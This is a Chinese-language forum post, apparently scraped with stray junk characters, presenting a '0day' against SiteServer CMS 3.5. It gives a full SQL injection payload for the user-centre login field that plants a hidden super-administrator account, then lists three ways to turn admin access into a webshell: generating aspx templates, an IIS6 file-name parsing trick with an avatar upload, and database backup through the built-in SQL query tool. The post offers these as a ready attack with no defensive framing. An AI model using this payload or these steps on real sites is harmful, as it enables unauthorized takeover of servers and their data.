SiteServer CMS 0Day

admin

经测试秒杀最新的3.5版

stieserver官网:www.siteserver.cn
9 ]' `% n+ t5 P

- [# n! O: w# L, W, r9 V0 f
EXP:
. L) m5 j* S3 l% h
. [$ y# q+ |6 l% O- e( ]直接访问UserCenter/login.aspx


2 F9 v3 R% M) ?2 n
. }4 t% O. T  @! `- K用户名处输入：
( j* b  P" B) `# L/ `2 ]6 H  S0 f
123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--



2 H( Q& V. W; {: m+ i0 X2 w密码为空，输入验证码后提交，既可向数据库中插入一个用户名为blue  密码为lanhai的超级用户。



之后再访问后台SiteServer/login.aspx用插入的用户登陆
3 h) n- D4 M0 F

$ U. N2 D3 ]! t9 Q1 Q) M6 J8 P
后台拿webshell的三种方法：
( g. \* g# P6 O9 }
$ O$ J  U/ k9 q一、

站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx

二、
3 U$ Z9 B( K: ^- d* C
, i) J4 P2 }% M2 G+ P成员权限-》添加用户-》用户名为：1.asp

. l2 h8 J- J( X5 }6 ]; Hhttp://127.0.0.1/usercenter/
5 P9 N0 X* K! ]4 J2 c1 g
* s- b3 U- D, ?用刚才添加的1.asp去登陆，进去之后上传个人头像，利用IIS6解析漏洞得webshell

' o; ?1 x4 W, [, f（ps：后台添加用户时不会验证是否含有非法字符）

! A$ v/ J) m! I6 ?. i三、
6 `9 s2 B; v4 r  B
系统工具-》实用工具-》机器参数查看
可以看到数据库类型、名称，WEB路径
, x  N- y0 s0 H) U1 |2 H' J& m
/ C+ u$ y% Y0 H- t系统工具-》数据库工具-》SQL语句查询
这功能做的不错，直接就相当于一个查询分析器，什么回显都有，可以backup得webshell，或者利用sqlserver配置不当直接XXOO。